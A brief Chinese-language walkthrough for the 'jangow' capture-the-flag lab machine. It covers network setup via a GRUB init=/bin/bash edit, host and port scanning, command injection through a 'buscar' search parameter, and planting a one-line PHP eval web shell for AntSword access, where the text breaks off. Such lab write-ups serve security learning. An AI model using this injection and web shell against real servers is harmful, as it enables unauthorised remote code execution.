jangow靶机攻略
配置网卡
VMware需要配置,不配置扫不到ip,VirtualBox正常打开ip会直接显示出来
网卡配置都改成NAT
打开虚拟机,第一个框选第二行,回车
选第二个,按e键
进入下一个框后,将ro 后面的修改为= rw signin init=/bin/bash
按ctrl+x ,进入命令界面
cd etc
cd network
ls
vim interfaces
进入文件后,把网卡改成ens33
之后重启,打开后就不用管了
开始攻略
扫描ip
arp-scan -l
扫描端口
nmap -sV
访问80端口
点击site
各个功能点都试了之后,发现在右上角的buscar点击之后网页上会有参数
输入whoami,发现有回显,说明存在漏洞
输入一句话木马
echo '<?php eval($_POST["cmd"]);' > 1.php
尝试使用蚁剑连接